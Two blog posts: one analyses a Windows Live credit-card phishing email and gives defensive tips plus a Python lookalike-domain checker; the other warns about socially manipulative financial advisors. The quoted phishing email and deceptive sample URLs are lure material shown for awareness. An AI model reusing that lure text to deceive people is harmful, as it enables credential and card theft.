© Copyright 2010 Yaacov Apelbaum All Rights Reserved.

Windows Live Credit Card Phishing

Phish

I recently received an email claiming to be from Microsoft Live. The email stated that due to some processing issues, they could not authorize my credit card and so I would need to login to their website to update my credit card information by clicking on their link.

Over the years, I have seen a number of these types of messages, but this was the first one targeting me personally.  After skimming through it, I realized that it was a blatant phishing attempt, nevertheless, I still marveled at the ingenuity of the scammers.

Yaacov Apelbaum-Fake MSN Image

Billing and Account Management

Dear Windows Live Hotmail member,
During our regularly scheduled account maintenance and verification procedures, our billing department was unable to authorize your current payment method information.

This might be due to either of the following reasons:

A recent change in your personal information (i.e. change of address, credit card)

Submitting invalid information during the initial Sign Up or upgrade process.

An inability to accurately verify your selected payment method information due to an internal error within our processors.
Please use the following link to update your payment method information:

http://billing.microsoft.com/logon.srf?action=SignIn&reason=auth&type=auto&uid=187&acct=49472101102

The above link may have been blocked for your privacy. To activate the link please look for the Show content link that is usually located on top of this message.

NOTE! If your account information is not updated within 48 hours then your ability to use your Windows Live Hotmail account will become restricted.

Thank you for using Windows Live Hotmail!
Please do not reply to this e-mail, as this is an unmonitored alias.

Yaacov Apelbaum-Fake Windows Live Image

  © 2009 Microsoft Corporation. All rights reserved.

For the uninitiated, phishing (pronounced “fishing”) is a fraudulent attempt to acquire sensitive information from a user. Such information can be: credit cards, user IDs, passwords, and/or account information. It is often accomplished via email or phone.

Phishing falls into the category of exploits known as “social engineering”. Even though they are mostly low tech (requiring neither sophisticated technology nor advanced programming), they can be successful (especially the well executed and new exploits) because most people instinctively tend to do what they are told and will not challenge the authority and authenticity of what seems to be an official correspondence.

In a typical phishing scenario, the perpetrators (usually located offshore) send a simple email, claiming to be from the customer service department of a recognizable organization (like a bank, on-line service, etc.), which informs you of some problem with your account. You are then instructed to provide details of your bank, email, or credit card account in order to correct this problem.

Even though phishing exploits can have many variations, they can be grouped into the following five usage scenarios:

  1. Forged identities — In this exploit, the attacker creates an email address that is related to a reputable organization like “Windows Live Customer Support”. Even though on the surface their email address looks legitimate (as in: billing@windowslive.com), it is not. If you’re not paying attention, it can be easy to mistake a message like this for a genuine customer support request.
  2. Compromised accounts — In this exploit, the attacker uses a compromised user account to send an email to everyone in the address book for that account. An email you receive from a known account dramatically increases the credibility of that message, and therefore the likelihood of a successful phishing attack.
  3. Direct phone calls — In this exploit, the scammer may contact you directly by phone, telling you that they work for some financial institution (they may offer to lower your interest rates) or for a fraud investigation department. They will inform you that your account has been breached and will directly ask you for your account details in order to verify it.
  4. Bogus websites — In this exploit, the attacker will send you a link to what seems to be a functional website. The site will include official-looking logos, language, or other identifying information taken directly from a legitimate website. The address of the site will resemble the name of a reputable company but with some spelling variations. For example, the name “microsoft.live.com” could appear instead as “micorsoft.live.com”.
  5. Social network harvesting — In this exploit, a communication from a scammer will ask you for personal information. You may mistake it for an email from a friend wanting to reconnect. The email will include convincing details about your personal life which were recovered from social networks such as LinkedIn, Facebook, etc.

In general, the objective of phishing is to recover your webmail credentials, since the resale value of a legitimate webmail account on the black market can be as high as $2-$3, twice the amount they could get for a stolen credit card number. So for a phisher, breaching several dozen accounts a day can be a lucrative business, making $100K-$500K over the life of the scam.

In the case of my phishing email, when I followed the link in it, I was taken to a credit card entry form (Image 1). As I expected, the form looked genuine; it had all the right corporate trimmings: a Microsoft logo, copyright notice, and even a link to a help page (which ironically offered the following advice: “You should keep this number secret, protect it, and never write it on your card.”)

Yaacov Apelbaum-Phishing Credit Card Form 
Image 1: Phishing Credit Card Entry Form

As with most phishing sites, I was expecting to find some bogus or misspelled Microsoft URL, but instead I was surprised to see that the web address of the webpage actually belonged to a company called Human & Technology H&T (Image 2); clearly, htech21.com doesn’t even sound like Microsoft. I checked out the parent URL and it turns out that this company was at one point a legitimate Korean hardware manufacturer; then, two years ago, its CEO was arrested and the company became the target of one of the biggest class-action lawsuits in history.

So what is the connection between htech21.com and this phishing expedition? It appears that the perpetrators of this scam decided to cut some costs and, instead of purchasing and hosting their own domain, they chose to break into the H&T corporate web site and place their credit card collection pages on it. At some point, our scammers discovered that Human & Technology had gone out of business (this could also have been an inside job) and safely assumed that this orphaned website (which had not been updated for 3 years) was no longer being maintained or monitored, and as such was a perfect staging platform for a phishing operation.

It is also interesting to note that the site’s help file, which focuses on ATMs (Automated Teller Machines), strongly suggests that at least some of the phishing website’s contents have also been used in other scams.

ATM

Yaacov Apelbaum-Human & Technology Phishing Website Korean  Yaacov Apelbaum-Human & Technology Phishing Website English
Image 2: Phishing Host Website

It is hard to distinguish legitimate customer service communications from phishing expeditions. This difficulty is further compounded by the fact that for many, using services such as Amazon, eBay, and e-banking has now become a way of life. For most users, the potential inconvenience of being locked out of their favorite on-line services outweighs the risk of disclosing their account information. Unfortunately, the on-line services are not helping this situation either, because most are either impossible to reach by phone or their offshore support centers are largely useless.

So how does one survive in the hostile jungle of email exploits? The following are my top 10 Do’s and Don’ts of email:

  • Do Not open emails that have a wrong or incorrect spelling of your name. Phishers often harvest email addresses in bulk and may not have your full name. Because of this, they will try to guess your name from your email address.
  • Do Not open emails that are not addressed to you by name. Phishers will almost never personalize correspondence; they will refer to you as “Dear Customer” or “Dear Valued Customer” because they send bulk solicitations to millions of email addresses.
  • Do Not respond to any account management email requests that claim to come from your bank. If your bank needs to reach you, they will send you an official letter or leave you a voice mail with a valid callback telephone number.
  • Do Not open unsolicited emails. Nothing in life is free; this includes the invitation to view naked celebrities and the Prozac and Viagra offers in your inbox.
  • Do Not use email links to go to any financial websites. Type in the URL yourself and save it as a bookmark.
  • Do verify the website URL you are about to log into; check the spelling carefully before you provide your login details on any web page. Pay close attention to the domain name following the “http://” section of the address. Many phishers will intentionally create very long names to obfuscate the fake URL.
  • Do log in to your on-line accounts regularly and look for unrecognized transactions. Do the same with your monthly credit card statements.
  • Do Not send your account details via email to anyone. Email traffic is unencrypted, so anyone en route can intercept the message.
  • Do check that the Internet connection you are using is secure. Look for HTTPS in the address field of your browser. You may also want to click on the padlock (encrypted connection icon) to view the actual server certificate. This will help you verify that it was issued by a reputable authority and assigned to the company managing the website in question.
  • Do make sure that you have updated anti-virus software and that your firewall is turned on.
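The “Bogus websites” scenario and the “Do verify the website URL” rule above both come down to one check: which domain does the link really land on, is it one the company actually owns, and is it merely a misspelling of one? The script below is an added example written for this post (not code from Microsoft or from the phishing kit); the sample links, the allow-list of brand domains and the two thresholds are constructed assumptions.

```python
from dataclasses import dataclass
from typing import Optional
from urllib.parse import urlparse

# Registrable domains the brand actually uses. Assumption for this example; a real
# check would use the organization's own published list.
EXPECTED_DOMAINS = {"microsoft.com", "live.com"}
LOOKALIKE_MAX_DISTANCE = 2   # assumed: one transposition or two typos
LONG_URL_THRESHOLD = 80      # assumed: longer URLs are flagged for a second look

# Constructed sample links (not the ones from the original email).
SAMPLE_LINKS = [
    "https://billing.microsoft.com/logon.srf?action=SignIn",
    "https://login.micorsoft.com/logon.srf",                        # transposed letters
    "http://billing.microsoft.com.account-verify.example/logon.srf?action=SignIn&reason=auth&type=auto&uid=187",
    "https://billing.microsoft.com@unrelated-host.example/update",  # brand name in the user part
    "http://unrelated-host.example/billing/form.html",
]


@dataclass
class LinkVerdict:
    url: str
    host: str
    registrable_domain: str
    https: bool
    lookalike_of: Optional[str]
    too_long: bool
    verdict: str  # "trusted", "lookalike" or "unrelated"


def levenshtein(a: str, b: str) -> int:
    """Edit distance; a small value between two domains means a probable lookalike."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable_domain(host: str) -> str:
    """Last two labels of the host. Assumption: ignores multi-label suffixes such as co.uk."""
    return ".".join(host.split(".")[-2:])


def check_link(url: str, expected: set = EXPECTED_DOMAINS) -> LinkVerdict:
    parsed = urlparse(url)
    # urlparse discards any user@ prefix, so "brand.com@evil.example" resolves to evil.example:
    # the brand name in front of the @ is just bait.
    host = (parsed.hostname or "").lower()
    domain = registrable_domain(host)
    https = parsed.scheme == "https"
    too_long = len(url) > LONG_URL_THRESHOLD
    if domain in expected:
        return LinkVerdict(url, host, domain, https, None, too_long, "trusted")
    nearest = min(expected, key=lambda d: levenshtein(domain, d))
    if levenshtein(domain, nearest) <= LOOKALIKE_MAX_DISTANCE:
        return LinkVerdict(url, host, domain, https, nearest, too_long, "lookalike")
    return LinkVerdict(url, host, domain, https, None, too_long, "unrelated")


if __name__ == "__main__":
    for link in SAMPLE_LINKS:
        v = check_link(link)
        print(f"{v.verdict:9} host={v.host} https={v.https} long={v.too_long}")
```

Note that the third sample starts with the genuine-looking “billing.microsoft.com” and only the last two labels reveal the real owner, which is exactly why the rule says to read the domain, not the beginning of the address.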

© Copyright 2009 Yaacov Apelbaum All Rights Reserved.

The Financial Advisor

https://apelbaum.wordpress.com/

You can’t miss him. He’s the guy with the freshly pressed $1000 suit, designer silk tie, and imported Italian shoes. His stylish attire is elegantly complemented by an expensive fountain pen, a standard issue Rolex, the latest cell phone, and a brand new luxury car. His physiognomy is unmistakable, styled hair, white teeth, and a nice tan; a modern day Cary Grant.

He’s a natural, standing out at every social gathering—in the fitness club, on the golf course, at church and synagogue. He is jovial and funny, the toast of the party, a real screamer.  Always the first to introduce himself, reaching across the room with a friendly and firm handshake.

He loves sports and works out regularly. Which one is his favorite? Well, he loves them all. If you let him, he’ll talk to you for hours about the Super Bowl, the NBA, or the US Open.

If sports are not your thing, that’s ok, he’ll talk politics. But don’t get him started! He has an opinion on all matters domestic and foreign, and he’s not afraid to share them with you. He has strong convictions about capitalism, socialism, the government, the environment…you name it.

After just 10 minutes talking with him, you think “Wow, is this guy connected to the hilt!” He just got back from Washington D.C (important meetings with policy makers and various other movers and shakers). And then, there is his story about the White House—and check this out: a wallet sized group photo with the local congressman/senator/governor. And did I mention that he’s on texting terms with several high profile celebrities?

He’s not a loner; he frequently travels with the wolf pack. The lovely spouse is always nearby, ready to lend a hand. She will strategically join the conversation and make a joke or a teasing observation at his expense (“Oh, my husband! He is such a Neanderthal. Ha, ha, ha!”), while your own wife whispers in your ear to check out his adorable son: “He’s only 7! Doesn’t he look mature in his tailored suit!” The kid, as if suddenly activated by some homing device, makes a beeline towards you for a handshake. “That’s my dad. He’s a financial advisor!” he says proudly.

By the time you’re done shaking hands with the kid, you realize that his dad has moved on. You watch him mingling with other guests, working the room like a cowboy in a rodeo, quickly branding the fattened calves for follow up. Then he’s back, telling you a joke about a CEO who signs a contract with the devil. Next comes the debriefing. What do you do? Who do you work for? Where is your office? Before you can say “Pocahontas”, he’s punching your e-mail and cell number into his smartphone.

A few days later, as you are getting ready to grab a bite to eat, your cell phone rings. “Hey, how’s it going?” says the friendly voice. “Who is this?” you answer, confused. “It’s the CEO and the devil guy from last week,” he continues without skipping a beat. “Hey, I happened to be in your neighborhood and I’ve got something for you. Do you wanna do lunch? It’s on me.” “Sure,” you reply, wondering what he can possibly have for you.

During lunch, he goes over more of the same routine. You discover that he either knows some C-level executives in your company or knows someone else who does, and he hints that he can pull some strings for you. After lunch, as you are preparing to leave, he springs a few expensive tickets for some sporting event and tells you that he and his significant other would love to have you and your significant other over in their private booth to watch the game. “Come on, it’s going to be fun!” A few days later when you come home from work, you discover a few boxes of toys and a bunch of CDs and DVDs on your dining room table. “What’s this, Honey?” you inquire. “Mr. CEO/devil’s wife just dropped them off. She said that their kids just love them and she thought ours would too!”

This goes on for several months, with lunches, family get-togethers, tickets to see a Broadway show and offers to use his timeshare in Disneyland for free. You eventually let down your guard; clearly these are such nice people.

Then one lunch, your newfound buddy, with an intense look on his face, tells you about this amazing 3-month, double digit return investment opportunity, but you have to act immediately! “How much are we looking at?” you inquire. “Oh, not much,” he says, “just $100K.” You politely decline, telling him that you don’t have that kind of money to invest. He says, “Can you borrow it from someone?” Sensing a high pressure sales tactic, you say that you don’t feel comfortable borrowing money from people. Your dining companion loosens up, assumes his collegial persona again and says, “Hey, that’s not a problem, I’ll keep my eyes open for other opportunities for you, but I don’t know if they’ll be as good as this one.”

Then the conversation turns to your company and he starts debriefing you about acquisition plans, mergers, strategy, etc. His questions seem strangely familiar. Oh yeah, you just recently went over them in the corporate anti-trust and insider information certification course. Now you realize that he’s actually fishing for insider information.

In a moment of complete mental lucidity, you suddenly get it. This guy is a professional shyster and he’s been playing you like a violin. Now would probably be a good time to end lunch and this relationship. But it’s not as easy as that. By now, he has woven himself into your social fabric. Severing the relationship now would cause you and your family mental anguish and would probably require some form of unfortunate confrontation. And what about mutual friends; what do you say to them?

And then there is the doubt issue. Even though now you know he’s dishonest and deceitful, shouldn’t you give him a break? After all, he’s just another guy with a family and a mortgage trying to make a living, isn’t he? So, what do you do?

The moral of the story is that this is all a scam. Don’t let your emotions get the better of you. These individuals and their accomplices are cold blooded opportunists. They couldn’t care less about you, your family, or your financial well being. Their interest in you is purely financial and short term. As for what you perceived to be generosity (the free tickets, lunch, gifts, etc.), it is just a device to make you feel indebted and emotionally dependent.

Unfortunately, as many have discovered, few of us are immune from this type of relationship and manipulation. If you think that being scammed financially only applies to fools, check out the Who’s Who on Bernie’s list.

The majority of independent financial advisors/planners operate as one man shows and are not dissimilar to the elixir and snake oil salesmen of the Old West. To compensate for their lack of breadth and depth of financial knowledge and operational know-how, they rent an office at a respectable address, contract with a financial service processor like Investors Capital, and purchase an off-the-shelf website that comes pre-loaded with content and functionality like whitepapers, newsletters, and financial calculators. The rest is pure social engineering.

Despite the aura of legitimacy the financial advisor/planner industry is trying to assume through meaningless certification and NASD regulation, the fact is that it is riddled with dishonest, unscrupulous confidence artists. If you need financial or investment advice, go with a large, non-contractor, non-commission based company like Fidelity. They won’t be able to guarantee double digit returns, but they won’t lose your investment overnight either. If you are new to investing, do yourself a big favor and carefully read the information on the FINRA site. You can also use some of their tools to check out your prospective broker buddy.

Good financial advice is hard to come by. Since most of us are not savvy enough to distinguish between the legitimate advisors and the Madoff wannabes, you should stay away from all independent financial advisors/planners, regardless of how smartly they dress or how successful they appear. This especially applies to the ones you know through your social circles.

If you do happen to use an independent financial advisor/planner, you may want to scrub him against the following list of the 7 deadly sins of financial conduct:

  1. Promising you a high return on your investment (especially ones in the double digit range)
  2. Using a sales pitch to tell you about sudden investment opportunities that require prompt action
  3. Soliciting you for insider information and asking you to act as a reference for other potential investors
  4. Paying you in cash or using proxy accounts (like personal checks from a spouse)
  5. Exhibiting dishonesty of any type (e.g. asking you to attend financial sales meetings masked as social events, or having any previous SEC or NASD history of complaints)
  6. Showing willingness to spend money on you for no apparent reason (including free lunches, gifts for the kids, etc.)
  7. Having a history of contentious job loss with larger financial institutions and lawsuits or litigation involving trading irregularities

If he fits one or more of these descriptions, it’s probably time for you and your investments to move on.

Caveat Emptor

© Copyright 2009 Yaacov Apelbaum All Rights Reserved.